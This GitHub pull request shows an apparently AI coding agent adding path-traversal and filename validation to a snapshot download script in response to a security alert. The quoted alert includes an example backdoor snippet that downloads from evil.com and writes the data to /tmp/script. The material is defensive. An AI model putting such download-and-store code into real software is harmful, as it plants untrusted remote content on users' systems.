Skip to content

Add path traversal validation to playground snapshot downloads#10002

Merged
pelikhan merged 3 commits intomainfrom
copilot/fix-security-alert-fetch-snapshots
Jan 14, 2026
Merged

Add path traversal validation to playground snapshot downloads#10002
pelikhan merged 3 commits intomainfrom
copilot/fix-security-alert-fetch-snapshots

Conversation

Copy link
Contributor

Copilot AI commented Jan 14, 2026
edited
Loading

Fix security alert in fetch-playground-snapshots.mjs

Security Issue

Line 589 writes user-controlled data from external source (file.name from GitHub API) to local file system without explicit validation at point of use.

Plan

  • Understand the security vulnerability and existing code
  • Add explicit filename validation before file write operation at line 589
  • Use path.basename() to prevent path traversal attacks
  • Add defensive check to ensure output path stays within outDir
  • Apply same fixes to Actions API mode (line 662) for consistency
  • Test the changes manually
  • Run linting and validation
  • Format and lint JavaScript files per review feedback

Changes Made

  1. fetchFromContentsApi (line 589): Added three-layer security validation:

    • Use path.basename() to strip any directory components
    • Explicit SAFE_FILENAME regex check at point of use
    • Path boundary check to prevent directory traversal

  2. fetchFromActionsApi (line 662): Applied same security measures for consistency

  3. Code formatting: Applied prettier formatting to docs/scripts .mjs files for consistency

Security Improvements

  • Path traversal prevention: path.basename() strips directory components like ../../../etc/
  • Filename validation: SAFE_FILENAME regex ensures only safe characters and patterns
  • Directory boundary check: Prevents writes outside the intended output directory
  • Defense in depth: Multiple validation layers provide robust security
Original prompt

Fix this security alert on docs/scripts/fetch-playground-snapshots.mjs:589

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation
Examine the highlighted code closely to ensure that it is behaving as intended.

Example
The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

var https = require("https");
var fs = require("fs");

https.get('https://evil.com/script', res => {
res.on("data", d => {
fs.writeFileSync("/tmp/script", d)
})
});
Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References
OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

✨ Let Copilot coding agent set things up for you — coding agent works faster and does higher quality work when set up for your repo.

@eaftan
Add explicit filename validation to prevent path traversal attacks
b968e1e 
- Add path.basename() sanitization before file writes
- Add explicit SAFE_FILENAME validation at point of use
- Add defensive path traversal check using path boundaries
- Apply fixes to both fetchFromContentsApi and fetchFromActionsApi modes
- Format code with prettier for consistency

Co-authored-by: eaftan <4733401+eaftan@users.noreply.github.com>
Copilot AI changed the title [WIP] Fix security alert in fetch-playground-snapshots Add path traversal validation to playground snapshot downloads Jan 14, 2026
Copilot AI requested a review from eaftan January 14, 2026 22:49
@pelikhan
Copy link
Contributor

pelikhan commented Jan 14, 2026

@copilot format, lint js

@pelikhan
Format JavaScript files with prettier
365a500 
- Run prettier on all .mjs files in docs/scripts
- Standardize quote style from single to double quotes
- All JavaScript files now pass lint-cjs validation

Co-authored-by: pelikhan <4175913+pelikhan@users.noreply.github.com>
Copy link
Contributor Author

Copilot AI commented Jan 14, 2026

@copilot format, lint js

Formatted and linted all JavaScript files in commit 365a500. All .mjs files in docs/scripts now use consistent double-quote style, and all JavaScript linting passes.

Copilot AI requested a review from pelikhan January 14, 2026 23:10
@pelikhan pelikhan marked this pull request as ready for review January 14, 2026 23:14
@pelikhan pelikhan merged commit d0d5225 into main Jan 14, 2026
@pelikhan pelikhan deleted the copilot/fix-security-alert-fetch-snapshots branch January 14, 2026 23:14
@github-actions github-actions bot mentioned this pull request Jan 15, 2026
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@pelikhan pelikhan pelikhan approved these changes

@eaftan eaftan Awaiting requested review from eaftan

Assignees

@eaftan eaftan

Copilot code review Copilot

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@pelikhan @eaftan